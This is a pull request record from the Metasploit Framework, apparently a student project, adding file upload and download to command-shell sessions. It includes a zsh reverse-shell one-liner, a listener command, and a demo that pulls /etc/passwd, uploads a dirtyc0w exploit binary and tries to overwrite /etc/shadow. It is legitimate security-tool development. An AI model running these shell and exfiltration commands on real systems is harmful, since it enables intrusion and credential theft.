### PR TITLE
[GSoC] Implementation of download/upload file in reverse shell

### PR DESCRIPTION
**Pull request by WangYihang**
## Description

This pull request implements the `download` command for reverse shell
Make reverse shell session more handy for download files

## Verification

> Create a reverse shell session between Attacker and Victim
- [x] [ATTACKER] Listen an a port 
```
./msfconsole -qx 'use multi/handler; set payload cmd/unix/reverse_zsh; set LHOST 127.0.0.1; set LPORT 4444; exploit'
```

- [x] [VICTIM] connect to attacker
```
zsh -c 'zmodload zsh/net/tcp && ztcp 127.0.0.1 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
```

#### Download

- [x] [ATTACKER] type `download` command
```
Usage: download [src] [dst]

Downloads remote files to the local machine.
This command does not support to download a FOLDER yet
```

- [x] [ATTACKER] type `download /etc/passwd /tmp/passwd`
```
download /etc/passwd /tmp/passwd
[*] Download /etc/passwd => /tmp/passwd
[*] Done
```

- [x] [ATTACKER] type `download /etc/nosuchfile /tmp/nosuchfile`
```
download /etc/nosuchfile /tmp/nosuchfile
[-] The target file does not exists
```

#### Upload

- [x] [ATTACKER] type `upload` command
```
Usage: upload [src] [dst]                            
                                                     
Uploads load file to the victim machine.             
This command does not support to upload a FOLDER yet 
```

- [x] [ATTACKER] type `download /tools/dirtyc0w /tmp/dirtyc0w`
```
upload /root/dirtyc0w /tmp/dirtyc0w                                     
[*] File </root/dirtyc0w> size: 13848, need 55 times writes to upload   
[*] Uploading (1/55)                                                    
[*] Uploading (2/55)                                                    
[*] Uploading (3/55)                                                    
...
[*] Uploading (53/55)                    
[*] Uploading (54/55)                    
[*] Uploading (55/55)                    
[+] File </tmp/dirtyc0w> upload finished 

file /tmp/dirtyc0w                                                                                       
/tmp/dirtyc0w: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /l
ib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=186b3cad78b04b20edaa57a816aa730dd472c816, n
ot stripped                                                                                              
```

- [x] [ATTACKER] type `upload /etc/nosuchfile /tmp/nosuchfile` (src file does not exists)
```
upload /etc/nosuchfile /tmp/genroot                                 
[-] Error occurs while uploading </etc/nosuchfile> to </tmp/genroot>
```

- [x] [ATTACKER] type `upload /etc/shadow /etc/shadow` (dst file is not writable)
```
upload /etc/nosuchfile /tmp/genroot                                                    
[-] Error occurs while uploading </etc/nosuchfile> to </tmp/genroot>                   
upload /etc/shadow /etc/shadow                                                         
[!] The file </etc/shadow> already exists on the target machine                        
                                                                                       
Overwrite the target file </etc/shadow>? [y/N]  N                                      
upload /etc/shadow /etc/shadow                                                         
[!] The file </etc/shadow> already exists on the target machine                        
                                                                                       
Overwrite the target file </etc/shadow>? [y/N]  y                                      
[-] Create new file on the target machine failed. (zsh: permission denied: /etc/shadow)                                                                                      
```

## TODO
- [ ] Download/Upload folders
- [ ] Support for large file while downloading (maybe divide the file into small pecies first)
- [ ] Download/Upload recursively
- [x] Support for large file while uploading

### CODE REVIEW

**Comment by WangYihang** [comment]
I am a little confuse about the TEST on CI...
The test result seem confusing, sometimes the code will pass all the tests, but something test failed...
eg: 
[FAILED] https://github.com/rapid7/metasploit-framework/pull/10449/commits/b220c9b0abf700b6cf544bd58088d48ee06c7a01
[PASSED] https://github.com/rapid7/metasploit-framework/pull/10449/commits/3fb814cef328f7d9ce8130df79a7a804c79aff6b

**Comment by WangYihang** [comment]
> Test result: https://travis-ci.org/rapid7/metasploit-framework/jobs/415035254
```
Retrying download gem from https://rubygems.org/ due to error (2/4): Gem::RemoteFetcher::UnknownHostError timed out (https://rubygems.org/gems/mini_portile2-2.3.0.gem)
Retrying download gem from https://rubygems.org/ due to error (3/4): Gem::RemoteFetcher::UnknownHostError timed out (https://rubygems.org/gems/mini_portile2-2.3.0.gem)
Retrying download gem from https://rubygems.org/ due to error (4/4): Gem::RemoteFetcher::UnknownHostError timed out (https://rubygems.org/gems/mini_portile2-2.3.0.gem)
Gem::RemoteFetcher::UnknownHostError: timed out
(https://rubygems.org/gems/mini_portile2-2.3.0.gem)
An error occurred while installing mini_portile2 (2.3.0), and
Bundler cannot continue.
Make sure that `gem install mini_portile2 -v '2.3.0' --source
'https://rubygems.org/'` succeeds before bundling.
In Gemfile:
  factory_bot_rails was resolved to 4.10.0, which depends on
    railties was resolved to 4.2.10, which depends on
      actionpack was resolved to 4.2.10, which depends on
        actionview was resolved to 4.2.10, which depends on
          rails-dom-testing was resolved to 1.0.9, which depends on
            nokogiri was resolved to 1.8.4, which depends on
              mini_portile2
The command "eval bundle install --without coverage development pcap --path=${BUNDLE_PATH:-vendor/bundle} " failed. Retrying, 2 of 3.

```
It seems like a network error... not causing by code...

> Test result: https://travis-ci.org/rapid7/metasploit-framework/jobs/415035260

I have no idea about how to fix it... 
Could you guys please give me a hand~ appreciate it~
@asoto-r7 @timwr @wvu-r7 @bcoles

**Comment by asoto-r7** [comment]
@WangYihang: Tests are all passing now.  No worries -- none of that was your fault.  It was just our test infrastructure being flaky.

I especially appreciate the inclusion of test cases that are expected to fail (when the file already exists, or when write permissions are denied).

Note that while the verification steps describe `zsh`, I've also verified this implementation works in `bash`.  👍

**Comment by asoto-r7** [comment]
## Release Notes

GSoC student @WangYihang added file transfer capability to cmd (i.e. non-Meterpreter) payloads.

File: lib/msf/base/sessions/command_shell.rb [hunk 1]
```diff
@@ -179,28 +166,288 @@ def cmd_sessions(*args)
...
+      # Calc how many time to append to the remote file
+      times = src_size / buffer_size + (src_size % buffer_size == 0 ? 0 : 1)
+      print_status("File <#{src}> size: #{src_size}, need #{times} times writes to upload")
+      # Start transfer
+
+      for i in 1..times do
+        print_status("Uploading (#{i * buffer_size}/#{src_size})")
+        chunk = src_fd.read(buffer_size)
+        chunk_repr = repr(chunk)
+        result = shell_command_token("echo -ne '#{chunk_repr}' >> #{dst}")
```
Comment (schierlm) [inline lib/msf/base/sessions/command_shell.rb]: `echo -n` is not POSIX. You should be able to do the same with `printf` command and only POSIX compliant options. https://www.unix.com/man-page/posix/1posix/printf/

Comment (wvu-r7) [reply lib/msf/base/sessions/command_shell.rb]: https://github.com/rapid7/metasploit-framework/blob/55d8360705702f5cbb389eaad0205da4dd292eda/lib/msf/core/post/file.rb#L442-L572

**Pull request merged**